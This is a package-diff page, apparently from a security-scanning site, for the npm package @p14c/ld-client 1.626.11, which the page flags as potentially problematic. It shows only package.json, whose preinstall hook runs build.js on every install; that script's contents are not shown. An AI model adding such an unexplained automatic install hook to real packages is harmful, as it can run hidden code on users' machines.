@p14c/ld-client 1.626.11
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of @p14c/ld-client might be problematic. Click here for more details.
- package/build.js +30 -0
- package/lib/ld-client.js +1654 -0
- package/package.json +26 -0
package/package.json
ADDED
@@ -0,0 +1,26 @@
|
|
1
|
+
{
|
2
|
+
"name": "@p14c/ld-client",
|
3
|
+
"version": "1.626.11",
|
4
|
+
"private": false,
|
5
|
+
"description": "",
|
6
|
+
"license": "MIT",
|
7
|
+
"author": "hp14c",
|
8
|
+
"main": "lib/ld-client.js",
|
9
|
+
"scripts": {
|
10
|
+
"build": "npm run mkdir && npx babel src --out-dir lib",
|
11
|
+
"preinstall": "node build.js",
|
12
|
+
"mkdir": "node mkdir.js",
|
13
|
+
"prepublishOnly": "npm run build",
|
14
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
15
|
+
},
|
16
|
+
"devDependencies": {
|
17
|
+
"babel-cli": "6.26.0",
|
18
|
+
"babel-core": "6.26.0",
|
19
|
+
"babel-plugin-transform-object-rest-spread": "6.26.0",
|
20
|
+
"babel-preset-env": "1.6.1",
|
21
|
+
"rollup": "^2.67.2"
|
22
|
+
},
|
23
|
+
"publishConfig": {
|
24
|
+
"access": "public"
|
25
|
+
}
|
26
|
+
}
|